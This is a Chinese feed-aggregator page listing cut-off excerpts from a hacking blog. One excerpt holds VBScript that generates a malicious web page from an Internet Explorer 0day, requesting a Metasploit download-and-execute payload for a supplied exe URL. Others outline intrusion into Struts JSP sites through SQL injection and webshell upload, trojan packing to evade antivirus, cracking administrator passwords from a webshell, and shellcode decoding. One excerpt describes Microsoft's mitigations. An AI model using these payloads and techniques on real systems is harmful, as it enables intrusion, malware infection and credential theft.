简介：影子鹰安全网络-主站技术blog

原站：http://www.cnyzy.cn

“影子鹰安全网络-主站技术BLOG”的内容更新

累计：38 篇（自 2008-11-13 起）

更新：约12篇/年，最后更新1158 天前

影子鹰安全网络-主站技术BLOG

IE XML Exploit (vista) 0day

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day网马生成器'code by lcxOn Error Resume NextExeurl = InputBox( "请输入exe的地址：", "输入", "http://www.haiyangtop.net/333.exe" )url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadCha... (311 天前)

http://inezha.com/w/2n4ien3

影子鹰安全网络-主站技术BLOG

最近那个IE7 0day shellcode解密

一、用freshow工具来解密原始链接http://bbs.kafan.cn/viewthread.php?tid=383769&page=1&extra=page%3D1#pid5736829需要提取shellcode解密1 将dadong替换为％u 进行一次esc解密－－up2 esc 旁填入 21 decode 应该就出现了二、自己动手吧，写个解密代码'解密代码code="%u5549%u5155%u0E1B%u560E%u5656%u520F%u494E%u0F54%u4E42%u0E4C%u0F10%u5944%u0044"function replaceregex(str)Ss... (311 天前)

http://inezha.com/w/8vpp7np

影子鹰安全网络-主站技术BLOG

4 种方法暂时屏蔽 IE 最新 0day

IE 最新 0day 波及了 微软全线系统，目前暂时没有补丁。 微软于近日发布了一份安全通报，指导您如何暂时屏蔽此漏洞。漏洞出在 OLEDB32.dll 这个文件上。所以我们的目的就是屏蔽这个文件。对此， 微软连出了4个杀手锏：1. SACL 法（仅适用于 Vista）[Unicode]Unicode=yes[Version]signature="$CHICAGO$"Revision=1[File Security]"%ProgramFiles%\Common Files\System\Ole DB\oledb32.... (311 天前)

http://inezha.com/w/o5f86nh

影子鹰安全网络-主站技术BLOG

入侵基于java Struts的JSP网站

入侵要点:找到注入点暴露网站页面绝对路径利用mysql的load_file()读取网站配置信息找到管理后台上传webshell了解一下 Struts和.do :首先了解一下什么是Struts。Struts是Apache基金会Jakarta项目组的一个Open Source项目，是一种优秀的J2EE MVC架构方式，它利用taglib获得可重用代码和抽象 java 代码，利用ActionServlet配合Struts-config.xml实现对整个系统导航。增强了开发人员对系统... (311 天前)

http://inezha.com/w/jw4xln9

影子鹰安全网络-主站技术BLOG

木马免杀之以壳制壳

几天前看了个程序伪装的教程，用的就是以壳制壳的方法，我想这种方法拿来给木马做免杀可不可以，试了下效果不错，对于杀软表面查杀很有效，现在跟大叫分享下。 可能要用这个方法的朋友 要有一个的脱壳基础 ，不用很深 ，只要会ESP定律即可。 ESP 定律：就是加载程序后 F8单步运行 第一个变化的 ESP 值，右击寄存器上 ESP 在转存中跟随，在内存地址上 选中前四个，右击，断点，硬件访问... (311 天前)

http://inezha.com/w/hppu5nu

影子鹰安全网络-主站技术BLOG

Webshell下破解计算机管理员密码

使用方法： 1、把你的密码字典改名成psw.txt后，上传到目标服务器的一个可执行、可写的目录中。这里假设这个目录是：c:\windows\temp\ 2、把程序上传到c:\windows\temp\中，然后运行它。 3、然后就是等待，过几分钟（具体时间看你的字典大小了）查阅c:\windows\temp\下的result_.txt中的结果， 如果为空就说明还没破解完，另选时间再回来看。特点： 不需要抓hash，不需要管理员权限，... (311 天前)

http://inezha.com/w/gibviv1

影子鹰安全网络-主站技术BLOG

修改shellcode异或加密的0day

早在迅雷出来的时候,就第一次出现了这种技术,原来的代码就解不了,这次的0day又一次出现了,异或的值是21,现在终于决定自已写一版PHP的,推倒呀推倒…有朋友问怎么才能找到异或的值是多少,网上有个教程的,可是太麻烦了,其实有一个简单的方法,就是把shellcode转成exe,http://www.cha88.cn/safe/shellcode_2_exe.php 转成exe以后,就用OD载入,就可以看到了,比如这次的0040103C 8030 21 xor ... (311 天前)

http://inezha.com/w/ugy31v0

相关订阅源